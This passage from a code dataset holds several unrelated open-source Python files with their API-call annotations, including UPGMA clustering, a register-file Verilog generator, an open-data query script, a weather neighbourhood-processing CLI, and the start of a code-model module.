({(310, 28, 310, 42): '[new_h, new_c]', (310, 44, 310, 45): '(1)'}, {}), '([new_h, new_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((388, 9, 388, 33), 'tensorflow.compat.v1.variable_scope', 'tf.variable_scope', ({(388, 27, 388, 32): 'scope'}, {}), '(scope)', True, 'import tensorflow.compat.v1 as tf\n'), ((404, 15, 404, 40), 'tensorflow.compat.v1.multiply', 'tf.multiply', ({(404, 27, 404, 32): 'alpha', (404, 34, 404, 39): 'layer'}, {}), '(alpha, layer)', True, 'import tensorflow.compat.v1 as tf\n'), ((426, 25, 426, 46), 'tensorflow.compat.v1.split', 'tf.split', ({(426, 34, 426, 39): 'state', (426, 41, 426, 42): '2', (426, 44, 426, 45): '1'}, {}), '(state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((429, 25, 430, 72), 'tensorflow.compat.v1.concat', 'tf.concat', ({(430, 10, 430, 68): '[total_h[:, self.num_units:], total_c[:, self.num_units:]]', (430, 70, 430, 71): '1'}, {}), '([total_h[:, self.num_units:], total_c[:, self.num_units:]], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((440, 13, 441, 67), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((442, 13, 443, 75), 'tensorflow.compat.v1.get_variable', 'tf.get_variable', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((449, 20, 449, 40), 'tensorflow.compat.v1.concat', 'tf.concat', ({(449, 30, 449, 36): '[x, h]', (449, 38, 449, 39): '1'}, {}), '([x, h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((455, 11, 455, 29), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(455, 21, 455, 22): 'x', (455, 24, 455, 28): 'w_xh'}, {}), '(x, w_xh)', True, 'import tensorflow.compat.v1 as tf\n'), ((456, 11, 456, 29), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(456, 21, 456, 22): 'h', (456, 24, 456, 28): 'w_hh'}, {}), '(h, w_hh)', True, 'import tensorflow.compat.v1 as tf\n'), ((459, 23, 459, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(459, 32, 459, 34): 'xh', (459, 36, 459, 37): '4', (459, 39, 459, 40): '1'}, {}), '(xh, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((466, 23, 466, 41), 'tensorflow.compat.v1.split', 'tf.split', ({(466, 32, 466, 34): 'hh', (466, 36, 466, 37): '4', (466, 39, 466, 40): '1'}, {}), '(hh, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((473, 23, 473, 43), 'tensorflow.compat.v1.split', 'tf.split', ({(473, 32, 473, 36): 'bias', (473, 38, 473, 39): '4', (473, 41, 473, 42): '0'}, {}), '(bias, 4, 0)', True, 'import tensorflow.compat.v1 as tf\n'), ((494, 25, 494, 56), 'tensorflow.compat.v1.split', 'tf.split', ({(494, 34, 494, 49): 'hyper_new_state', (494, 51, 494, 52): '2', (494, 54, 494, 55): '1'}, {}), '(hyper_new_state, 2, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((495, 20, 495, 50), 'tensorflow.compat.v1.concat', 'tf.concat', ({(495, 30, 495, 46): '[new_h, hyper_h]', (495, 48, 495, 49): '1'}, {}), '([new_h, hyper_h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((496, 20, 496, 50), 'tensorflow.compat.v1.concat', 'tf.concat', ({(496, 30, 496, 46): '[new_c, hyper_c]', (496, 48, 496, 49): '1'}, {}), '([new_c, hyper_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((497, 24, 497, 64), 'tensorflow.compat.v1.concat', 'tf.concat', ({(497, 34, 497, 60): '[new_total_h, new_total_c]', (497, 62, 497, 63): '1'}, {}), '([new_total_h, new_total_c], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((110, 15, 110, 40), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(110, 25, 110, 31): 'concat', (110, 33, 110, 39): 'w_full'}, {}), '(concat, w_full)', True, 'import tensorflow.compat.v1 as tf\n'), ((117, 12, 117, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(117, 20, 117, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((120, 14, 120, 28), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(120, 22, 120, 27): 'new_c'}, {}), '(new_c)', True, 'import tensorflow.compat.v1 as tf\n'), ((120, 31, 120, 44), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(120, 42, 120, 43): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((122, 20, 122, 48), 'tensorflow.compat.v1.concat', 'tf.concat', ({(122, 30, 122, 44): '[new_c, new_h]', (122, 46, 122, 47): '(1)'}, {}), '([new_c, new_h], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((150, 20, 150, 56), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(150, 44, 150, 55): 'gamma_start'}, {}), '(gamma_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((177, 20, 177, 56), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(177, 44, 177, 55): 'gamma_start'}, {}), '(gamma_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((191, 21, 191, 40), 'tensorflow.compat.v1.square', 'tf.square', ({(191, 31, 191, 39): 'x - mean'}, {}), '(x - mean)', True, 'import tensorflow.compat.v1 as tf\n'), ((219, 15, 219, 52), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(219, 39, 219, 51): 'weight_start'}, {}), '(weight_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((232, 13, 232, 28), 'tensorflow.compat.v1.matmul', 'tf.matmul', ({(232, 23, 232, 24): 'x', (232, 26, 232, 27): 'w'}, {}), '(x, w)', True, 'import tensorflow.compat.v1 as tf\n'), ((305, 12, 305, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(305, 20, 305, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((308, 59, 308, 72), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(308, 70, 308, 71): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((482, 17, 482, 43), 'tensorflow.compat.v1.concat', 'tf.concat', ({(482, 27, 482, 39): '[i, j, f, o]', (482, 41, 482, 42): '1'}, {}), '([i, j, f, o], 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((484, 21, 484, 43), 'tensorflow.compat.v1.split', 'tf.split', ({(484, 30, 484, 36): 'concat', (484, 38, 484, 39): '4', (484, 41, 484, 42): '1'}, {}), '(concat, 4, 1)', True, 'import tensorflow.compat.v1 as tf\n'), ((489, 12, 489, 22), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(489, 20, 489, 21): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((492, 67, 492, 80), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(492, 78, 492, 79): 'o'}, {}), '(o)', True, 'import tensorflow.compat.v1 as tf\n'), ((106, 22, 106, 50), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(106, 46, 106, 49): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((115, 26, 115, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(115, 34, 115, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((119, 18, 119, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(119, 29, 119, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((119, 53, 119, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(119, 64, 119, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n'), ((147, 6, 147, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((153, 50, 153, 78), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(153, 74, 153, 77): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((174, 6, 174, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((180, 46, 180, 74), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(180, 70, 180, 73): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((209, 6, 209, 29), 'tensorflow.compat.v1.get_variable_scope', 'tf.get_variable_scope', ({}, {}), '()', True, 'import tensorflow.compat.v1 as tf\n'), ((221, 15, 221, 64), 'tensorflow.compat.v1.random_normal_initializer', 'tf.random_normal_initializer', (), '', True, 'import tensorflow.compat.v1 as tf\n'), ((231, 22, 231, 57), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(231, 46, 231, 56): 'bias_start'}, {}), '(bias_start)', True, 'import tensorflow.compat.v1 as tf\n'), ((303, 26, 303, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(303, 34, 303, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((307, 18, 307, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(307, 29, 307, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((307, 53, 307, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(307, 64, 307, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n'), ((446, 22, 446, 50), 'tensorflow.compat.v1.constant_initializer', 'tf.constant_initializer', ({(446, 46, 446, 49): '0.0'}, {}), '(0.0)', True, 'import tensorflow.compat.v1 as tf\n'), ((487, 26, 487, 36), 'tensorflow.compat.v1.tanh', 'tf.tanh', ({(487, 34, 487, 35): 'j'}, {}), '(j)', True, 'import tensorflow.compat.v1 as tf\n'), ((491, 18, 491, 50), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(491, 29, 491, 49): '(f + self.forget_bias)'}, {}), '(f + self.forget_bias)', True, 'import tensorflow.compat.v1 as tf\n'), ((491, 53, 491, 66), 'tensorflow.compat.v1.sigmoid', 'tf.sigmoid', ({(491, 64, 491, 65): 'i'}, {}), '(i)', True, 'import tensorflow.compat.v1 as tf\n')] |
u6052029/cogent3 | src/cogent3/cluster/UPGMA.py | ca0efcb7f60b715bcbfbecd924cdb98a53cefe20 | # usr/bin/env python
"""Functions to cluster using UPGMA
upgma takes an dictionary of pair tuples mapped to distances as input.
UPGMA_cluster takes an array and a list of PhyloNode objects corresponding
to the array as input. Can also generate this type of input from a DictArray using
inputs_from_dict_array function.
Both return a PhyloNode object of the UPGMA cluster
"""
import numpy
from numpy import argmin, array, average, diag, ma, ravel, sum, take
from cogent3.core.tree import PhyloNode
from cogent3.util.dict_array import DictArray
__author__ = "Catherine Lozupone"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Catherine Lozuopone", "Rob Knight", "Peter Maxwell"]
__license__ = "BSD-3"
__version__ = "2020.7.2a"
__maintainer__ = "Catherine Lozupone"
__email__ = "[email protected]"
__status__ = "Production"
numerictypes = numpy.core.numerictypes.sctype2char
Float = numerictypes(float)
BIG_NUM = 1e305
def upgma(pairwise_distances):
"""Uses the UPGMA algorithm to cluster sequences
pairwise_distances: a dictionary with pair tuples mapped to a distance
returns a PhyloNode object of the UPGMA cluster
"""
darr = DictArray(pairwise_distances)
matrix_a, node_order = inputs_from_dict_array(darr)
tree = UPGMA_cluster(matrix_a, node_order, BIG_NUM)
index = 0
for node in tree.traverse():
if not node.parent:
node.name = "root"
elif not node.name:
node.name = "edge." + str(index)
index += 1
return tree
def find_smallest_index(matrix):
"""returns the index of the smallest element in a numpy array
for UPGMA clustering elements on the diagonal should first be
substituted with a very large number so that they are always
larger than the rest if the values in the array."""
# get the shape of the array as a tuple (e.g. (3,3))
shape = matrix.shape
# turn into a 1 by x array and get the index of the lowest number
matrix1D = ravel(matrix)
lowest_index = argmin(matrix1D)
# convert the lowest_index derived from matrix1D to one for the original
# square matrix and return
row_len = shape[0]
return divmod(lowest_index, row_len)
def condense_matrix(matrix, smallest_index, large_value):
"""converges the rows and columns indicated by smallest_index
Smallest index is returned from find_smallest_index.
For both the rows and columns, the values for the two indices are
averaged. The resulting vector replaces the first index in the array
and the second index is replaced by an array with large numbers so that
it is never chosen again with find_smallest_index.
"""
first_index, second_index = smallest_index
# get the rows and make a new vector that has their average
rows = take(matrix, smallest_index, 0)
new_vector = average(rows, 0)
# replace info in the row and column for first index with new_vector
matrix[first_index] = new_vector
matrix[:, first_index] = new_vector
# replace the info in the row and column for the second index with
# high numbers so that it is ignored
matrix[second_index] = large_value
matrix[:, second_index] = large_value
return matrix
def condense_node_order(matrix, smallest_index, node_order):
"""condenses two nodes in node_order based on smallest_index info
This function is used to create a tree while condensing a matrix
with the condense_matrix function. The smallest_index is retrieved
with find_smallest_index. The first index is replaced with a node object
that combines the two nodes corresponding to the indices in node order.
The second index in smallest_index is replaced with None.
Also sets the branch length of the nodes to 1/2 of the distance between
the nodes in the matrix"""
index1, index2 = smallest_index
node1 = node_order[index1]
node2 = node_order[index2]
# get the distance between the nodes and assign 1/2 the distance to the
# lengthproperty of each node
distance = matrix[index1, index2]
nodes = [node1, node2]
d = distance / 2.0
for n in nodes:
if n.children:
n.length = d - n.children[0].TipLength
else:
n.length = d
n.TipLength = d
# combine the two nodes into a new PhyloNode object
new_node = PhyloNode()
new_node.children.append(node1)
new_node.children.append(node2)
node1.parent = new_node
node2.parent = new_node
# replace the object at index1 with the combined node
node_order[index1] = new_node
# replace the object at index2 with None
node_order[index2] = None
return node_order
def UPGMA_cluster(matrix, node_order, large_number):
"""cluster with UPGMA
matrix is a numpy array.
node_order is a list of PhyloNode objects corresponding to the matrix.
large_number will be assigned to the matrix during the process and
should be much larger than any value already in the matrix.
WARNING: Changes matrix in-place.
WARNING: Expects matrix to already have diagonals assigned to large_number
before this function is called.
"""
num_entries = len(node_order)
tree = None
for i in range(num_entries - 1):
smallest_index = find_smallest_index(matrix)
index1, index2 = smallest_index
# if smallest_index is on the diagonal set the diagonal to large_number
if index1 == index2:
matrix[diag([True] * len(matrix))] = large_number
smallest_index = find_smallest_index(matrix)
row_order = condense_node_order(matrix, smallest_index, node_order)
matrix = condense_matrix(matrix, smallest_index, large_number)
tree = node_order[smallest_index[0]]
return tree
def inputs_from_dict_array(darr):
"""makes inputs for UPGMA_cluster from a DictArray object
"""
darr.array += numpy.eye(darr.shape[0]) * BIG_NUM
nodes = list(map(PhyloNode, darr.keys()))
return darr.array, nodes
| [((42, 11, 42, 40), 'cogent3.util.dict_array.DictArray', 'DictArray', ({(42, 21, 42, 39): 'pairwise_distances'}, {}), '(pairwise_distances)', False, 'from cogent3.util.dict_array import DictArray\n'), ((64, 15, 64, 28), 'numpy.ravel', 'ravel', ({(64, 21, 64, 27): 'matrix'}, {}), '(matrix)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((65, 19, 65, 35), 'numpy.argmin', 'argmin', ({(65, 26, 65, 34): 'matrix1D'}, {}), '(matrix1D)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((83, 11, 83, 42), 'numpy.take', 'take', ({(83, 16, 83, 22): 'matrix', (83, 24, 83, 38): 'smallest_index', (83, 40, 83, 41): '0'}, {}), '(matrix, smallest_index, 0)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((84, 17, 84, 33), 'numpy.average', 'average', ({(84, 25, 84, 29): 'rows', (84, 31, 84, 32): '0'}, {}), '(rows, 0)', False, 'from numpy import argmin, array, average, diag, ma, ravel, sum, take\n'), ((120, 15, 120, 26), 'cogent3.core.tree.PhyloNode', 'PhyloNode', ({}, {}), '()', False, 'from cogent3.core.tree import PhyloNode\n'), ((162, 18, 162, 42), 'numpy.eye', 'numpy.eye', ({(162, 28, 162, 41): 'darr.shape[0]'}, {}), '(darr.shape[0])', False, 'import numpy\n')] |
kf7lsu/RegfileCompiler-public | src/python/make_store_entry.py | 0845f1458137cef06d584047bb4287a72c6afbab | #this code will generate the structural verilog for a single entry in the register file
#takes in the output file manager, the entry number, the number of bits, the number of reads, and the width of the
#tristate buffers on the read outputs
#expects the same things as make_store_cell, ensure code is valid there
#Matthew Trahms
#EE 526
#4/20/21
from make_store_cell import make_store_cell
def make_store_entry(out_file, entry_number, bits, reads, buff_width, regfile_num):
#just need to create the correct number of bits
#this and the make_store_array are going to be pretty simple
for bit in range(bits):
make_store_cell(out_file, entry_number, bit, reads, buff_width, regfile_num)
return
if __name__ == '__main__':
f = open('store_entry_test.txt', 'w')
rows = 4
cols = 2
reads = 2
for row in range(rows):
make_store_entry(f, row, cols, reads, 1, 0)
f.close()
| [((17, 2, 17, 78), 'make_store_cell.make_store_cell', 'make_store_cell', ({(17, 18, 17, 26): 'out_file', (17, 28, 17, 40): 'entry_number', (17, 42, 17, 45): 'bit', (17, 47, 17, 52): 'reads', (17, 54, 17, 64): 'buff_width', (17, 66, 17, 77): 'regfile_num'}, {}), '(out_file, entry_number, bit, reads, buff_width, regfile_num)', False, 'from make_store_cell import make_store_cell\n')] |
oceandelee/tac | module1/api.py | 62ffbcb31b374a9fa83a1ee6010b2e00f2de8a7c | """API for AVB"""
import json
import sys
import requests
def actualite_found ():
osm = "https://opendata.bruxelles.be/api/datasets/1.0/search/?q="
data = {
"nhits":0,
"parameters":{
"dataset":"actualites-ville-de-bruxelles",
"timezone":"UTC",
"q":"actualite",
"language": "fr",
"rows":10,
"start":0,
"sort":[
"published"
]
,
"format":"json"
}
,
"records":[]
}
resp = requests.get(osm, data)
if resp.status_code == 200:
print(resp.json()["datasets"][0]["metas"])
else:
print("actualite not found")
return resp
def get_result(resp,n,attribut):
metas = resp.json()["datasets"][n]["metas"]
return metas[attribut]
def nb_result(resp):
return len(resp.json()["datasets"])
#Example of use
if __name__ == "__main__":
resp = actualite_found()
result = get_result(resp,2,"description")
print(result)
print(nb_result(resp)) | [((31, 11, 31, 34), 'requests.get', 'requests.get', ({(31, 24, 31, 27): 'osm', (31, 29, 31, 33): 'data'}, {}), '(osm, data)', False, 'import requests\n')] |
cpelley/improver | improver/cli/nbhood.py | ebf77fe2adc85ed7aec74c26671872a2e4388ded | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Script to run neighbourhood processing."""
from improver import cli
from improver.constants import DEFAULT_PERCENTILES
@cli.clizefy
@cli.with_output
def process(
cube: cli.inputcube,
mask: cli.inputcube = None,
*,
neighbourhood_output,
neighbourhood_shape,
radii: cli.comma_separated_list,
lead_times: cli.comma_separated_list = None,
degrees_as_complex=False,
weighted_mode=False,
area_sum=False,
remask=False,
percentiles: cli.comma_separated_list = DEFAULT_PERCENTILES,
halo_radius: float = None,
):
"""Runs neighbourhood processing.
Apply the requested neighbourhood method via the
NeighbourhoodProcessing plugin to a Cube.
Args:
cube (iris.cube.Cube):
The Cube to be processed.
mask (iris.cube.Cube):
A cube to mask the input cube. The data should contain 1 for
usable points and 0 for discarded points.
Only supported with square neighbourhoods. (Optional)
neighbourhood_output (str):
The form of the results generated using neighbourhood processing.
If "probabilities" is selected, the mean probability with a
neighbourhood is calculated. If "percentiles" is selected, then
the percentiles are calculated with a neighbourhood. Calculating
percentiles from a neighbourhood is only supported for a circular
neighbourhood.
Options: "probabilities", "percentiles".
neighbourhood_shape (str):
Name of the neighbourhood method to use. Only a "circular"
neighbourhood shape is applicable for calculating "percentiles"
output.
Options: "circular", "square".
radii (list of float):
The radius or a list of radii in metres of the neighbourhood to
apply.
If it is a list, it must be the same length as lead_times, which
defines at which lead time to use which nbhood radius. The radius
will be interpolated for intermediate lead times.
lead_times (list of int):
The lead times in hours that correspond to the radii to be used.
If lead_times are set, radii must be a list the same length as
lead_times.
degrees_as_complex (bool):
Include this option to process angles as complex numbers.
Not compatible with circular kernel or percentiles.
weighted_mode (bool):
Include this option to set the weighting to decrease with radius.
Otherwise a constant weighting is assumed.
weighted_mode is only applicable for calculating "probability"
neighbourhood output using the circular kernel.
area_sum (bool):
Return sum rather than fraction over the neighbourhood area.
remask (bool):
Include this option to apply the original un-neighbourhood
processed mask to the neighbourhood processed cube.
Otherwise the original un-neighbourhood processed mask
is not applied. Therefore, the neighbourhood processing may result
in values being present in area that were originally masked.
percentiles (float):
Calculates value at the specified percentiles from the
neighbourhood surrounding each grid point. This argument has no
effect if the output is probabilities.
halo_radius (float):
Set this radius in metres to define the excess halo to clip. Used
where a larger grid was defined than the standard grid and we want
to clip the grid back to the standard grid. Otherwise no clipping
is applied.
Returns:
iris.cube.Cube:
A processed Cube.
Raises:
RuntimeError:
If weighted_mode is used with the wrong neighbourhood_output.
RuntimeError:
If degree_as_complex is used with
neighbourhood_output='percentiles'.
RuntimeError:
If degree_as_complex is used with neighbourhood_shape='circular'.
"""
from improver.nbhood import radius_by_lead_time
from improver.nbhood.nbhood import (
GeneratePercentilesFromANeighbourhood,
NeighbourhoodProcessing,
)
from improver.utilities.pad_spatial import remove_cube_halo
from improver.wind_calculations.wind_direction import WindDirection
sum_or_fraction = "sum" if area_sum else "fraction"
if neighbourhood_output == "percentiles":
if weighted_mode:
raise RuntimeError(
"weighted_mode cannot be used with" 'neighbourhood_output="percentiles"'
)
if degrees_as_complex:
raise RuntimeError("Cannot generate percentiles from complex " "numbers")
if neighbourhood_shape == "circular":
if degrees_as_complex:
raise RuntimeError(
"Cannot process complex numbers with circular neighbourhoods"
)
if degrees_as_complex:
# convert cube data into complex numbers
cube.data = WindDirection.deg_to_complex(cube.data)
radius_or_radii, lead_times = radius_by_lead_time(radii, lead_times)
if neighbourhood_output == "probabilities":
result = NeighbourhoodProcessing(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
weighted_mode=weighted_mode,
sum_or_fraction=sum_or_fraction,
re_mask=remask,
)(cube, mask_cube=mask)
elif neighbourhood_output == "percentiles":
result = GeneratePercentilesFromANeighbourhood(
neighbourhood_shape,
radius_or_radii,
lead_times=lead_times,
percentiles=percentiles,
)(cube)
if degrees_as_complex:
# convert neighbourhooded cube back to degrees
result.data = WindDirection.complex_to_deg(result.data)
if halo_radius is not None:
result = remove_cube_halo(result, halo_radius)
return result
| [((157, 34, 157, 72), 'improver.nbhood.radius_by_lead_time', 'radius_by_lead_time', ({(157, 54, 157, 59): 'radii', (157, 61, 157, 71): 'lead_times'}, {}), '(radii, lead_times)', False, 'from improver.nbhood import radius_by_lead_time\n'), ((155, 20, 155, 59), 'improver.wind_calculations.wind_direction.WindDirection.deg_to_complex', 'WindDirection.deg_to_complex', ({(155, 49, 155, 58): 'cube.data'}, {}), '(cube.data)', False, 'from improver.wind_calculations.wind_direction import WindDirection\n'), ((178, 22, 178, 63), 'improver.wind_calculations.wind_direction.WindDirection.complex_to_deg', 'WindDirection.complex_to_deg', ({(178, 51, 178, 62): 'result.data'}, {}), '(result.data)', False, 'from improver.wind_calculations.wind_direction import WindDirection\n'), ((180, 17, 180, 54), 'improver.utilities.pad_spatial.remove_cube_halo', 'remove_cube_halo', ({(180, 34, 180, 40): 'result', (180, 42, 180, 53): 'halo_radius'}, {}), '(result, halo_radius)', False, 'from improver.utilities.pad_spatial import remove_cube_halo\n'), ((160, 17, 167, 9), 'improver.nbhood.nbhood.NeighbourhoodProcessing', 'NeighbourhoodProcessing', (), '', False, 'from improver.nbhood.nbhood import GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing\n'), ((169, 17, 174, 9), 'improver.nbhood.nbhood.GeneratePercentilesFromANeighbourhood', 'GeneratePercentilesFromANeighbourhood', (), '', False, 'from improver.nbhood.nbhood import GeneratePercentilesFromANeighbourhood, NeighbourhoodProcessing\n')] |
ipa-mirb/bonsai | bonsai/model.py | cb73317cdf779566f7c496fc39546c9c689aa09c |
#Copyright (c) 2017 Andre Santos
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
###############################################################################
# Language Model
###############################################################################
class CodeEntity(object):
"""Base class for all programming entities.
All code objects have a file name, a line number, a column number,
a programming scope (e.g. the function or code block they belong to)
and a parent object that should have some variable or collection
holding this object.
"""
def __init__(self, scope, parent):
"""Base constructor for code objects.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
self.scope = scope
self.parent = parent
self.file = None
self.line = None
self.column = None
def walk_preorder(self):
"""Iterates the program tree starting from this object, going down."""
yield self
for child in self._children():
for descendant in child.walk_preorder():
yield descendant
def filter(self, cls, recursive=False):
"""Retrieves all descendants (including self) that are instances
of a given class.
Args:
cls (class): The class to use as a filter.
Kwargs:
recursive (bool): Whether to descend recursively down the tree.
"""
source = self.walk_preorder if recursive else self._children
return [
codeobj
for codeobj in source()
if isinstance(codeobj, cls)
]
def _afterpass(self):
"""Finalizes the construction of a code entity."""
pass
def _validity_check(self):
"""Check whether this object is a valid construct."""
return True
def _children(self):
"""Yield all direct children of this object."""
# The default implementation has no children, and thus should return
# an empty iterator.
return iter(())
def _lookup_parent(self, cls):
"""Lookup a transitive parent object that is an instance
of a given class."""
codeobj = self.parent
while codeobj is not None and not isinstance(codeobj, cls):
codeobj = codeobj.parent
return codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return (' ' * indent) + self.__str__()
def ast_str(self, indent=0):
"""Return a minimal string to print a tree-like structure.
Kwargs:
indent (int): The number of indentation levels.
"""
line = self.line or 0
col = self.column or 0
name = type(self).__name__
spell = getattr(self, 'name', '[no spelling]')
result = ' ({})'.format(self.result) if hasattr(self, 'result') else ''
prefix = indent * '| '
return '{}[{}:{}] {}{}: {}'.format(prefix, line, col,
name, result, spell)
def __str__(self):
"""Return a string representation of this object."""
return self.__repr__()
def __repr__(self):
"""Return a string representation of this object."""
return '[unknown]'
class CodeStatementGroup(object):
"""This class is meant to provide common utility methods for
objects that group multiple program statements together
(e.g. functions, code blocks).
It is not meant to be instantiated directly, only used for
inheritance purposes.
It defines the length of a statement group, and provides methods
for integer-based indexing of program statements (as if using a list).
"""
def statement(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.body.statement(i)
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
try:
return self.statement(i + 1)
except IndexError as e:
return None
def __getitem__(self, i):
"""Return the *i*-th statement from the object's `body`."""
return self.statement(i)
def __len__(self):
"""Return the length of the statement group."""
return len(self.body)
# ----- Common Entities -------------------------------------------------------
class CodeVariable(CodeEntity):
"""This class represents a program variable.
A variable typically has a name, a type (`result`) and a value
(or `None` for variables without a value or when the value is unknown).
Additionally, a variable has an `id` which uniquely identifies it in
the program (useful to resolve references), a list of references to it
and a list of statements that write new values to the variable.
If the variable is a *member*/*field*/*attribute* of an object,
`member_of` should contain a reference to such object, instead of `None`.
"""
def __init__(self, scope, parent, id, name, result):
